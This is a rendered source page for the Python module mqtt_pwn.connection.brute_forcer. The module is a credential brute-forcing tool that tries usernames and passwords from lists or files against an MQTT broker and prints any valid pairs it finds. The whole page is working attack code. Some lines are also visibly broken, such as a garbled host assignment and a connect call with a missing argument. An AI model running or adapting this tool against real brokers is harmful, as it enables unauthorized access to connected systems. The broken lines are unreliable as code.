Source code for mqtt_pwn.connection.brute_forcer

from pathlib import Path
from paho.mqtt.client import Client, MQTT_ERR_SUCCESS
import time

[docs]class ConnectionResult(object): """Represents a connection result (success/fail)""" def __init__(self): self._return_code = None @property def did_succeed(self): """A property that contains data whether the connection has succeeded""" return self._return_code == MQTT_ERR_SUCCESS
[docs] def set_return_code(self, return_code): """Sets the return code field""" self._return_code = return_code
[docs]class AuthBruteForce(object): """The class responsible from brute force a broker""" valid_criterias = ('usernames', 'passwords') def __init__(self, cli, host, port, usernames, passwords): self.cli = cli = host self.port = port self.timeout = 2 self.usernames = usernames self.passwords = passwords self._errors_found = False def _are_valid_credentials(self, username, password): """Checks whether credentials are valid""" def _on_connect(client, userdata, flags, rc): """A callback that matches the MQTT client signature, that triggers when connection was established""" userdata.set_return_code(rc) client.disconnect() client.loop_stop() client.should_stop = True con_result = ConnectionResult() client = Client(userdata=con_result) client.username_pw_set(username, password) client.on_connect = _on_connect start_time = time.time() client.should_stop = False client.connect_async(, self.port) client.loop_start() while not client.should_stop and time.time() - start_time < self.timeout: time.sleep(0.001) return con_result.did_succeed def _brute(self): """Start the actual bruteforce effort""" for username in self._create_generator_for('usernames'): if self._errors_found: break for password in self._create_generator_for('passwords'): if self._are_valid_credentials(username, password): self.cli.print_ok(f'Found valid credentials: {username}:{password}')
[docs] def brute(self): """A wrapper for the _brute method, mainly to catch keyboard interrupts""" try: self._brute() except KeyboardInterrupt: self.cli.print_error('Brute force has stopped...', start='\n')
def _validate_criteria(self, criteria): """Validates whether the criteria resides within the valid criteria list""" if criteria not in AuthBruteForce.valid_criterias: raise ValueError('Criteria not valid') def _create_generator_for(self, criteria): """Created a generator for a certain criteria, agnostic to whether its a file or a list""" self._validate_criteria(criteria) self_criteria = getattr(self, criteria) if isinstance(self_criteria, list): for item in self_criteria: yield item elif isinstance(self_criteria, str): path = Path(self_criteria) if path.exists() and path.is_file(): with open(self_criteria, 'r') as f: for line in f: yield line.strip() else: self.cli.print_error(f'Path "{path}" does not exist!') self._errors_found = True